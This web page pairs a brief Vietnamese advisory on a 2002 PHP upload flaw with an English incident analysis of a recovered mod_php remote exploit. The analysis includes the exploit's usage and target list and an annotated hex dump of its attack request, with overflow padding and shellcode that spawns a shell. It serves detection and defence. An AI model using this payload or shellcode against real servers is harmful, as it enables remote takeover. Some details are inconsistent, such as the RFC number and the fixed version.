Lỗi của PHP (PHP remote vulnerabilities) :
trang này đã được đọc lầnAdvisory 01/2002
PHP remote vulnerabilities
Release Date: 2002/02/27
Một lỗi cực mới của PHP3, PHP4 trong phần upload file, xuất phát từ hàm
php_mime_split, cho phép hacker có thể thực hiện những đoạn mã theo ý.
Một Chú ý quan trọng, điểm yếu không chỉ xảy ra khi chạy các scripts dùng để Upload File, mà nó xảy ra trong bất kỳ đoạn mã script nào !
Những server nào phải lên đến bản PHP4.2 (cực mới, mới ra lò) mới thoát lỗi này. Nó cũng tác động chủ yếu lên HĐH Linux, Solaris. PHP3 thì chơi tất cả các HĐH.
Possible PHP Exploit
Summary:
An exploit for PHP 4 was recovered, which appears to
give attackers an open shell on remote systems running a number
of different versions of PHP 4. The binary appears to use a
bug in 'rfc1876.c', which is said to be fixed in versions higher
than 4.0.6.
===============
PHP is an apache module implementing a general-purpose
scripting language. PHP code can be embeded in HTML and is
interpreted by apache whenever the page is requested.
The 'rfc1876.c' implements the ability to upload data
files using multipart MIME forms (multipart/form-data).
Other than the fact that an empty 'HEAD' request is suspicious, there is
nothing special about this request. Unlike other web server exploits, this
exploit will take advantage of HTTP/1.1. This way, even if only one out
http://www.faqs.org/rfcs/rfc1867.html
RFC1876 pretty much implements standard 'multipart/mime'
syntax to upload files, and asssociated properties. A basic
client request will look like the following:
Content-type: multipart/form-data, boundary=(boundary string)
- --(boundary string)
content-disposition: from-data; name="name_of_input_field"
filename
- --(boundary string)
content-disposition: form-data; name="name_of_file_field";
filename="filename"
Content-Type: text/plain
(content of the file)
- --(boundary string)--
Exploit
=======
The exploit provided to incidents.org calls itself
'73501867'.
Running it without parameters reveals the following usage
instructions:
73501867 - x86/linux mod_php v4.0.2rc1-v4.0.5 remote exploit
by lorian.
usage: ./73501867 [options] <hostname> <phpfile>
Options:
-c check exploitability only, do not exploit
-f force mode, override check results
-n no check mode
-l retloc set retlocation
-a retaddr set return address
-t target choose target
(1) Debian 2.2r3 / Apache 1.3.20 / PHP 4.0.3 (GOT
_estrndup)
(2) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (GOT
_estrndup)
(3) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (stack)
(4) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (apache GOT
kill)
(5) Debian 2.2r3 / Apache 1.3.9 / PHP 4.0.3p1 (stack)
(6) CRASH ME
(7) Debian 2.2r3 / Apache 1.3.20 / PHP 4.0.5 (stack)
(8) RedHat 7.1 / apache-1.3.19-5 from RPM / PHP/4.X
(9) Mandrake 8.0 / apache-1.3.19-3mdk from RPM / PHP/4.X
The '-c' option will send a 'HEAD' request to the server and analyse the
returned string for patterns matching exploitable versions:
(from apache access log)
127.0.0.1 - - [26/Feb/2002:23:07:27 -0500] "HEAD / HTTP/1.1" 200 0 "-" "-"
Unlike other web server exploits, this exploit will take
advantage of
HTTP/1.1 and will allow targeting name virtual hosts. Even if the default
host does not use php, other name virtual hosts may.
Exploit Signature
=================
Next, we ran the exploit against netcat. This time, we used
the '-f -n'
options to avoid the 'HEAD' request and allow the exploit to execute
regardless of the missing response from netcat.
All the signatures are very similar to each other. As they
are quite
large (approx. 77500 bytes), I will only discuss one.
0000000: 504f 5354 202f 7465 7374 2e70 6870 2048 POST
/test.php H
0000010: 5454 502f 312e 310d 0a41 6363 6570 743a TTP/1.1..Accept:
0000020: 2069 6d61 6765 2f67 6966 2c20 696d 6167 image/gif, imag
0000030: 652f 782d 7862 6974 6d61 702c 2069 6d61 e/x-xbitmap, ima
0000040: 6765 2f6a 7065 672c 2069 6d61 6765 2f70 ge/jpeg, image/p
0000050: 6a70 6567 2c20 2a2f 2a0d 0a52 6566 6572 jpeg, */*..Refer
0000060: 6572 3a20 6874 7470 3a2f 2f6c 6f63 616c er: http://local/
0000070: 686f 7374 2f69 6e64 6578 2e68 746d 6c0d host/index.html.
0000080: 0a41 6363 6570 742d 4c61 6e67 7561 6765 .Accept-Language
0000090: 3a20 6465 2c65 6e2d 7573 3b71 3d30 2e35 : de,en-us;q=0.5
00000a0: 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type:
00000b0: 6d75 6c74 6970 6172 742f 666f 726d 2d64 multipart/form-d
00000c0: 6174 613b 2062 6f75 6e64 6172 793d 6802 ata; boundary=h.
#
# A one byte boundary ('h') is unusual, but legal. However,
# this part may make a nice IDS signature
#
00000d0: 010d 0a41 6363 6570 742d 456e 636f 6469
...Accept-Encodi
00000e0: 6e67 3a20 677a 6970 2c20 6465 666c 6174 ng: gzip, deflat
00000f0: 650d 0a55 7365 722d 4167 656e 743a 204d e..User-Agent: M
0000100: 6f7a 696c 6c61 2f34 2e30 2028 636f 6d70 ozilla/4.0 (comp
0000110: 6174 6962 6c65 3b20 4d53 4945 2035 2e35 atible; MSIE 5.5
0000120: 3b20 5769 6e64 6f77 7320 4e54 2035 2e30 ; Windows NT 5.0
0000130: 290d 0a48 6f73 743a 206c 6f63 616c 686f )..Host: localho
0000140: 7374 0d0a 436f 6e74 656e 742d 4c65 6e67 st..Content-Leng
0000150: 7468 3a20 3737 3137 330d 0a43 6f6e 6e65 th: 77173..Conne
0000160: 6374 696f 6e3a 204b 6565 702d 416c 6976 ction: Keep-Aliv
0000170: 650d 0a43 6163 6865 2d43 6f6e 7472 6f6c e..Cache-Control
0000180: 3a20 6e6f 2d63 6163 6865 0d0a 0d0a 2d2d : no-cache....--
0000190: 6802 010d 0a43 6f6e 7465 6e74 2d44 6973 h....Content-Dis
00001a0: 706f 7369 7469 6f6e 3a20 666f 726d 2d64 position: form-d
00001b0: 6174 613b 206e 616d 653d 22cc cccc cccc ata; name=".....
00001c0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001d0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001e0: cccc cccc cccc cccc cccc cccc cccc cccc ................
00001f0: cccc cccc cccc cccc cccc cccc cccc cccc ................
0000200: cccc cccc cccc cccc cccc cccc cccc cc00 ................
0000210: 0000 0000 0000 005c 4628 4000 0000 00cc .......\F(@.....
0000220: cccc cccc cccc cccc cccc cccc cccc cccc ................
#
# a number of identical lines ommited. Realize that the
# 'name' paramter is very large. No idea what the sequence
# of '00' \F(@ '00' is about.
#
# The content length given in the header appears right.
#
#
00002c0: cccc cccc cccc cccc cccc cccc cccc cccc
................
00002d0: cccc cc22 3b20 6669 6c65 6e61 6d65 3d22 ..."; filename="
00002e0: eb0c eb0c eb0c eb0c eb0c eb0c eb0c eb0c ................
#
# again, I omitted a number of identical lines. A lot this
# time (see byte counter), followed by what could be shell
# code at the end.
#
00104c0: eb0c eb0c eb0c eb0c eb0c eb0c eb0c eb0c
................
00104d0: eb0c eb0c 31c0 50b0 1bcd 808b e531 dbf7 ....1.P......1..
00104e0: e3b0 1bcd 8060 89e2 6a20 5452 31c9 5159 .....`..j TR1.QY
00104f0: 4151 89e1 6a07 5b6a 6658 cd80 09c0 75ef AQ..j.[jfX....u.
0010500: 803a 0275 ea5b 31c9 b03f cd80 fec1 b03f .:.u.[1..?.....?
0010510: cd80 fec1 b03f cd80 b00b 9952 686e 2f73 .....?.....Rhn/s
0010520: 6868 2f2f 6269 89e3 5253 89e1 cd80 cc0c hh//bi..RS......
0010530: 220d 0a43 6f6e 7465 6e74 2d54 7970 653a "..Content-Type:
0010540: 2074 6578 742f 706c 6169 6e0d 0acc cccc text/plain.....
0010550: cccc cccc cccc cccc cccc cccc cccc cccc ................
(again, ommited a lot of lines)
0012c40: cccc cccc cccc cccc cccc cccc cccc cccc ................
0012c50: cccc cccc cccc cccc cccc cccc cc0d 0a2d ...............-
0012c60: 2d68 0201 0d0a 436f 6e74 656e 742d 4469 -h....Content-Di
0012c70: 7370 6f73 6974 696f 6e3a 2066 6f72 6d2d sposition: form-
0012c80: 6461 7461 3b20 6e61 6d65 3d22 cccc cccc data; name="....
0012c90: cccc cccc cccc cccc cccc cccc cccc cccc ................
(over long 'name')
0012ef0: cccc cccc cccc cccc cccc cccc 220d 0a20 ............"..
0012f00: 0d0a 20 ..
==========
Exploit or hoax? I was not quite able to get it to work on
either RH 7.1 or 7.2. However, in RH 7.1 the exploit appeared
to provide a shell (however, the shell was not able to execute
anything). This exploit may be very sensitive to particular
apache/php configurations.
Upgrading to php 4.1.1 appears to be the safe bet at this point.
